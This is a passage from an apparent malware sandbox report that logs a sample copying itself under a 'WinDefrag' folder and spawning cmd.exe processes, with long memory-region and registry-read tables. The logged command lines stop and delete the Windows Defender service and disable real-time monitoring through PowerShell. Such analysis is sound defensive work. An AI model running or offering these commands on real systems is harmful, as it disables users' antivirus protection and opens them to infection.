| File | Copy | source_filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
2 |
Process #8: cmd.exe
57
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:59, Reason: Child Process |
| Unmonitor | End Time: 00:02:01, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8a4 |
| Parent PID | 0x698 (c:\users\aetadzjz\appdata\local\temp\tmp6149.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8AC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c10000 | 0x01c10000 | 0x01f52fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f60000 | 0x0222efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a090000 | 0x4a0dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x754b0000 | 0x754b6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x8ac
57
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:27:43 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 173005 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a090000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76234a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\sc.exe, os_pid = 0x350, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000005 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #9: cmd.exe
57
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:59, Reason: Child Process |
| Unmonitor | End Time: 00:02:02, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8b0 |
| Parent PID | 0x698 (c:\users\aetadzjz\appdata\local\temp\tmp6149.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
89C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00121fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00230fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00240fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00697fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00850fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x01c5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c60000 | 0x01c60000 | 0x01fa2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01fb0000 | 0x0227efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a090000 | 0x4a0dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x754b0000 | 0x754b6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x89c
57
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:27:43 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 172973 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a090000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76234a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\sc.exe, os_pid = 0x410, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000005 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #10: cmd.exe
57
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:42, Reason: Self Terminated |
| Monitor Duration | 00:00:42 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x894 |
| Parent PID | 0x698 (c:\users\aetadzjz\appdata\local\temp\tmp6149.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
890
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x0015ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00757fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x00950fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000960000 | 0x00960000 | 0x01d5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d60000 | 0x01d60000 | 0x020a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x020b0000 | 0x0237efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a090000 | 0x4a0dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x754b0000 | 0x754b6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
